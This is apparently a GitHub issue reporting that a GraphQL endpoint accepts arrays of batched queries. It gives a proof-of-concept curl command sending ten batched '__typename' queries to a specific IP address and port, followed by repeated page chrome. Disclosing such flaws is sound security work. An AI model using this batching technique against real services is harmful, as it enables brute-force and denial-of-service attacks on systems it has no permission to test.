Graphql Array Based Query Batching Vulnerability

# summary

The GraphQL implementation supports receiving an array of queries in a single HTTP request instead of a single query, thereby allowing attackers to launch brute-force attacks and DOS attacks.

---
 

# POC

```
curl -X POST -H "User-Agent: oxpecker" -H "Accept-Encoding: gzip, deflate" -H "Accept: */*" -H "Connection: keep-alive" -H "Content-Length: 390" -H "Content-Type: application/json" -d '[{"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}]' 'http://34.127.101.91:40410/graphql'
```
---

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Graphql Array Based Query Batching Vulnerability #544

summary

POC

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Graphql Array Based Query Batching Vulnerability #544

Description

summary

POC

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions